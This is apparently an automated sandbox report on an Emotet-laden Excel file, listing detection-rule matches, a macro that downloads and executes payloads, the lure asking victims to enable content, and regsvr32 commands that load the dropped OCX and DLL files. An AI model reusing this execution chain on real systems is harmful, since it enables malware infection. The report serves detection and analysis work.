                  barindex
                  Yara detected Emotet
                  Source: Yara matchFile source: 7.2.regsvr32.exe.1f40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2020000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.regsvr32.exe.1f40000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2020000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                  Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                  Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                  Found malicious Excel 4.0 Macro
                  Source: Bericht 6581.xlsMacro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
                  Source: Bericht 6581.xlsMacro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
                  Office process drops PE file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dllJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\soci4.ocxJump to dropped file
                  Found Excel 4.0 Macro with suspicious formulas
                  Source: Bericht 6581.xlsInitial sample: EXEC
                  Source: Bericht 6581.xlsInitial sample: EXEC
                  Source: Bericht 6581.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                  Source: C:\Users\user\Desktop\Bericht 6581.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\NfgWijQQRQpENoq\Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A0987_2_000000018001A098
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018003E0D07_2_000000018003E0D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800180E07_2_00000001800180E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C0F47_2_000000018001C0F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E1347_2_000000018001E134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C1507_2_000000018002C150
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A1A07_2_000000018001A1A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018004E1C07_2_000000018004E1C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800181E47_2_00000001800181E4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800262887_2_0000000180026288
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A2A87_2_000000018001A2A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800182E87_2_00000001800182E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E3207_2_000000018001E320
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C3247_2_000000018001C324
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800583387_2_0000000180058338
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A3B47_2_000000018001A3B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800063E07_2_00000001800063E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800183F07_2_00000001800183F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002E4207_2_000000018002E420
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E5087_2_000000018001E508
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C5107_2_000000018001C510
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800285147_2_0000000180028514
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C51C7_2_000000018002C51C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800185487_2_0000000180018548
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018005A5A47_2_000000018005A5A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800266187_2_0000000180026618
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800186507_2_0000000180018650
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800286687_2_0000000180028668
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018004067C7_2_000000018004067C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018004E6F07_2_000000018004E6F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C6FC7_2_000000018001C6FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E7347_2_000000018001E734
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800187587_2_0000000180018758
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800427CC7_2_00000001800427CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800287E47_2_00000001800287E4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800188607_2_0000000180018860
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800168707_2_0000000180016870
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800548F87_2_00000001800548F8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C9007_2_000000018002C900
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E91C7_2_000000018001E91C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C92C7_2_000000018001C92C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800169787_2_0000000180016978
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800189CC7_2_00000001800189CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800427CC7_2_00000001800427CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026A247_2_0000000180026A24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016A807_2_0000000180016A80
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EB047_2_000000018001EB04
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018B107_2_0000000180018B10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001CB187_2_000000018001CB18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016B8C7_2_0000000180016B8C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018004EBA07_2_000000018004EBA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018C547_2_0000000180018C54
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002CCCC7_2_000000018002CCCC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016CE87_2_0000000180016CE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001CD007_2_000000018001CD00
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ED307_2_000000018001ED30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018D987_2_0000000180018D98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016DF07_2_0000000180016DF0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018004CEC87_2_000000018004CEC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018EC87_2_0000000180018EC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016EF87_2_0000000180016EF8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EF187_2_000000018001EF18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001CF2C7_2_000000018001CF2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180042F887_2_0000000180042F88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018FD07_2_0000000180018FD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800170007_2_0000000180017000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800190D87_2_00000001800190D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F1047_2_000000018001F104
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D1147_2_000000018001D114
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800171587_2_0000000180017158
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002D19C7_2_000000018002D19C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800191E07_2_00000001800191E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800172607_2_0000000180017260
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D2FC7_2_000000018001D2FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018004F2FC7_2_000000018004F2FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001B3107_2_000000018001B310
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F3347_2_000000018001F334
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800193387_2_0000000180019338
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800173687_2_0000000180017368
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800194407_2_0000000180019440
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800174747_2_0000000180017474
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002B49C7_2_000000018002B49C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001B4F87_2_000000018001B4F8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F5207_2_000000018001F520
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D5287_2_000000018001D528
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800195487_2_0000000180019548
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800175D07_2_00000001800175D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800196507_2_0000000180019650
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002D6807_2_000000018002D680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_003B00008_2_003B0000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214A8048_2_0214A804
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214A4088_2_0214A408
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02157E288_2_02157E28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214406C8_2_0214406C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021538948_2_02153894
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02137CAC8_2_02137CAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214C8C08_2_0214C8C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021461108_2_02146110
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02135B188_2_02135B18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215A3048_2_0215A304
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02148B3C8_2_02148B3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02152F3C8_2_02152F3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214BD648_2_0214BD64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021313688_2_02131368
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021443688_2_02144368
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021341A88_2_021341A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214C9F08_2_0214C9F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02147FEC8_2_02147FEC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021474148_2_02147414
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021432108_2_02143210
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021436108_2_02143610
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021310148_2_02131014
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214F61C8_2_0214F61C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021464188_2_02146418
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02143E188_2_02143E18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02152E048_2_02152E04
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213BC088_2_0213BC08
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02147C308_2_02147C30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02155E308_2_02155E30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214F2388_2_0214F238
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021526388_2_02152638
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021328208_2_02132820
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214D6208_2_0214D620
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021540208_2_02154020
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214762C8_2_0214762C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214B0288_2_0214B028
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214D2548_2_0214D254
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213F8508_2_0213F850
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02145C508_2_02145C50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213E2548_2_0213E254
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214EE5C8_2_0214EE5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213FE588_2_0213FE58
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213C4588_2_0213C458
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02159A408_2_02159A40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214484C8_2_0214484C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215344C8_2_0215344C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021348488_2_02134848
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02152C488_2_02152C48
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214FC708_2_0214FC70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021340788_2_02134078
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02134C648_2_02134C64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02140C688_2_02140C68
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02150C688_2_02150C68
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213F2908_2_0213F290
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215BE908_2_0215BE90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215369C8_2_0215369C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021366988_2_02136698
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213B6988_2_0213B698
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02133A9C8_2_02133A9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021406808_2_02140680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021354848_2_02135484
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215A0888_2_0215A088
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021446B48_2_021446B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215B6BC8_2_0215B6BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021330BC8_2_021330BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213B2BC8_2_0213B2BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021576A48_2_021576A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021414A08_2_021414A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214E4A88_2_0214E4A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021516A88_2_021516A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213FAD08_2_0213FAD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214D4D08_2_0214D4D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021390D48_2_021390D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021584DC8_2_021584DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021478C48_2_021478C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02150AC48_2_02150AC4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02149EC08_2_02149EC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213CCC88_2_0213CCC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02154EF48_2_02154EF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021512FC8_2_021512FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02152AFC8_2_02152AFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213B0F88_2_0213B0F8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021424E48_2_021424E4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021336E08_2_021336E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021372E08_2_021372E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02138CE08_2_02138CE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02151AE08_2_02151AE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02132AE48_2_02132AE4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214ACEC8_2_0214ACEC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215B0EC8_2_0215B0EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02133CE88_2_02133CE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02158EE88_2_02158EE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02143D1C8_2_02143D1C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021549188_2_02154918
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021533048_2_02153304
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213D3008_2_0213D300
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021327088_2_02132708
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214EB088_2_0214EB08
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214A1308_2_0214A130
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021543308_2_02154330
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215093C8_2_0215093C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02156F3C8_2_02156F3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021437248_2_02143724
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02147B248_2_02147B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214C7208_2_0214C720
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021497208_2_02149720
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215BD208_2_0215BD20
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021565208_2_02156520
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213BD248_2_0213BD24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02151D2C8_2_02151D2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215632C8_2_0215632C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02158B288_2_02158B28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213D92C8_2_0213D92C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02149D5C8_2_02149D5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215155C8_2_0215155C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214B5588_2_0214B558
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02138F5C8_2_02138F5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021471448_2_02147144
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02133F408_2_02133F40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02156B408_2_02156B40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021349488_2_02134948
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215B5708_2_0215B570
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213DB748_2_0213DB74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021469788_2_02146978
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021405788_2_02140578
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214F7648_2_0214F764
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02140B608_2_02140B60
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0215796C8_2_0215796C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213CB6C8_2_0213CB6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02142F948_2_02142F94
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021445948_2_02144594
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021465948_2_02146594
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021589908_2_02158990
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021351988_2_02135198
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213F5808_2_0213F580
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213ED848_2_0213ED84
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02141B888_2_02141B88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02143BB48_2_02143BB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02147DB08_2_02147DB0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02137BB48_2_02137BB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021429BC8_2_021429BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02150DBC8_2_02150DBC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214E7A48_2_0214E7A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021427A48_2_021427A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214C5AC8_2_0214C5AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214EFAC8_2_0214EFAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213B1A88_2_0213B1A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02159DA88_2_02159DA8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021393AC8_2_021393AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02153DD48_2_02153DD4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021507D08_2_021507D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021325D88_2_021325D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214ABD88_2_0214ABD8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214D9C48_2_0214D9C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02132DC08_2_02132DC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213DFCC8_2_0213DFCC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213EFCC8_2_0213EFCC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021499F48_2_021499F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021331F08_2_021331F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021513FC8_2_021513FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_021493E08_2_021493E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213AFE48_2_0213AFE4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0213B3E48_2_0213B3E4
                  Source: Bericht 6581.xlsMetadefender: Detection: 34%
                  Source: Bericht 6581.xlsReversingLabs: Detection: 46%
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci1.ocxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci2.ocxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci3.ocxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\soci4.ocxJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\soci3.ocxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5669.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/11@4/51
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: Bericht 6581.xlsOLE indicator, Workbook stream: true
                  Source: Bericht 6581.xls.0.drOLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214A804 Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,CloseHandle,8_2_0214A804
